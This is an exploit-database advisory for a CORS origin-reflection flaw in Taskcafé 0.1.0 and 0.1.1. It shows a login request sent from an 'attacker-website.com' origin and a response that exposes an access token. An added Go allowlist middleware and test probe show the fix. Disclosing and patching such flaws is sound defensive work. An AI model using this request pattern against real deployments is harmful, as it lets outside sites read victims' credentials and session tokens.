## https://sploitus.com/exploit?id=PACKETSTORM:160083
#Exploit Title: Taskcafé 0.1.0 and 0.1.1 - Cross-Origin Resource Sharing  
#Date: 2020-09-02  
#Exploit Author: Mufaddal Masalawala  
#Vendor Homepage: https://github.com/JordanKnott/  
#Software Link: https://github.com/JordanKnott/taskcafe  
#Version: 0.1.0 and 0.1.1  
#Tested on: Kali Linux 2020.3  
#POC:  
The web application fails to properly validate the Origin header  
and returns the header Access-Control-Allow-Credentials: true. In this  
configuration, any website can issue requests that carry the user's  
credentials and read the responses to those requests. Trusting arbitrary  
origins effectively disables the same-origin policy, allowing two-way  
interaction by third-party websites.  
#REQUEST:  
POST /auth/login HTTP/1.1  
Host: 10.20.175.152:3333  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://10.20.175.152:3333/login  
Content-Type: text/plain;charset=UTF-8  
Origin: http://attacker-website.com  
Content-Length: 43  
Connection: close  
Cookie: refreshToken=c00f94f3-c151-4e13-8084-ea160d94e584  

{"username":"XXXX","password":"XXXXXX"}  
#RESPONSE:  
HTTP/1.1 200 OK  
Access-Control-Allow-Credentials: true  
Access-Control-Allow-Origin: http://attacker-website.com  
Access-Control-Expose-Headers: Link  
Content-Type: application/json  
Set-Cookie: refreshToken=9048c8fd-0f7c-4c9d-9e88-2cd9f7a25d61; Expires=Thu, 03 Sep 2020 04:22:10 GMT; HttpOnly  
Vary: Origin  
Date: Wed, 02 Sep 2020 04:22:10 GMT  
Content-Length: 271  
Connection: close  

{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI4YmRhMmY5ZS1iM2E3LTRmNzgtOTQ2Ny05YWZmNGM0OGFkZTAiLCJyZXN0cmljdGVkIjoidW5yZXN0cmljdGVkIiwib3JnUm9sZSI6Im1lbWJlciIsImV4cCI6MTU5OTAyMDUzNX0.eDYvNvXRf6CKULCOrMLAtKnUek9Y8IP9YnVXRAR74gE","isInstalled":false}
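
A server-side fix for the behaviour shown in the response above, as an added example that is not part of the original advisory or of the Taskcafé code base: a Go net/http middleware that sends the credentialed CORS headers only for exact allowlist matches, next to a trust-everything policy that models the vulnerable response. The origin https://tasks.example.test and the names cors, allowlisted, reflectAny and probe are assumptions made for this example.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// Constructed allowlist: exact scheme://host[:port] strings of trusted front ends.
var allowedOrigins = map[string]bool{"https://tasks.example.test": true}

// reflectAny models the response above: every Origin is trusted.
func reflectAny(string) bool { return true }

// allowlisted trusts exact matches only, so "null", look-alike hosts and
// http:// variants of a listed origin are all refused.
func allowlisted(origin string) bool { return allowedOrigins[origin] }

// cors sends the credentialed CORS headers only when trust(origin) is true;
// without Access-Control-Allow-Origin the browser withholds the response.
func cors(trust func(string) bool, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Add("Vary", "Origin")
		if o := r.Header.Get("Origin"); o != "" && trust(o) {
			w.Header().Set("Access-Control-Allow-Origin", o)
			w.Header().Set("Access-Control-Allow-Credentials", "true")
		}
		next.ServeHTTP(w, r)
	})
}

// probe sends POST /auth/login with the given Origin through cors(trust, ...)
// and returns the Allow-Origin and Allow-Credentials response headers.
func probe(trust func(string) bool, origin string) (string, string) {
	ok := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) })
	req := httptest.NewRequest(http.MethodPost, "/auth/login", nil)
	req.Header.Set("Origin", origin)
	rec := httptest.NewRecorder()
	cors(trust, ok).ServeHTTP(rec, req)
	h := rec.Header()
	return h.Get("Access-Control-Allow-Origin"), h.Get("Access-Control-Allow-Credentials")
}

func main() {
	for _, o := range []string{"http://attacker-website.com", "null", "https://tasks.example.test"} {
		acao, acac := probe(allowlisted, o)
		fmt.Printf("%-30s ACAO=%q ACAC=%q\n", o, acao, acac)
	}
}
```

The same probe can be pointed at a deployed instance during regression testing: an untrusted Origin should come back with neither Access-Control-Allow-Origin nor Access-Control-Allow-Credentials.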